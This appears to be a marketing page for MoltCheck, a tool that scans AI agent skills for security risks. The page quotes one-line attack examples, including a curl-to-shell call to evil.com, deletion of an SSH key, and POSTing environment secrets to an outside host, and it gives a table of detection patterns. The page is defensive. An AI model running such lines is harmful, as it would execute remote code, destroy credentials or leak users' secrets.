Is this Skill safe?
Scan any Moltbot Skill for security risks before you install it. Detect shell injection, data exfiltration, and hidden threats.
AI Agent Skills Are a New Attack Vector
Third-party skills execute with your agent's permissions. Without scanning, you're blindly trusting unknown code.
Remote Code Execution
Malicious skills use exec(), eval(), or new Function() to run arbitrary commands.
exec('curl evil.com | sh')File System Attacks
Skills can read, overwrite, or delete files—including SSH keys and credentials.
fs.unlinkSync('~/.ssh/id_rsa')Data Exfiltration
Network-enabled skills can silently POST API keys and secrets to external servers.
fetch(evil, {body: process.env})Dependency Attacks
Typosquatting and compromised packages introduce hidden vulnerabilities.
npm install lodahsInteractive Security Scanner
Paste code or load a preset to see MoltCheck in action.
Click "Run Security Analysis" to scan the code...
What MoltCheck Detects
Three detection engines working together: AST analysis, regex patterns, and dependency scanning.
| Severity | Pattern | Risk |
|---|---|---|
| critical | exec(), spawn(), eval() | Arbitrary code execution |
| critical | Typosquatted packages | Supply chain attack |
| critical | Prompt injection | Agent manipulation |
| high | fs.writeFile, fs.unlink | File tampering/deletion |
| high | String construction evasion | Hidden malicious code |
| medium | fetch(), axios, http.request | Data exfiltration |
| medium | Time bomb patterns | Delayed activation |
| low | process.env access | Environment exposure |
Ready to secure your agent?
Start scanning skills for free. Upgrade for API access and batch scanning.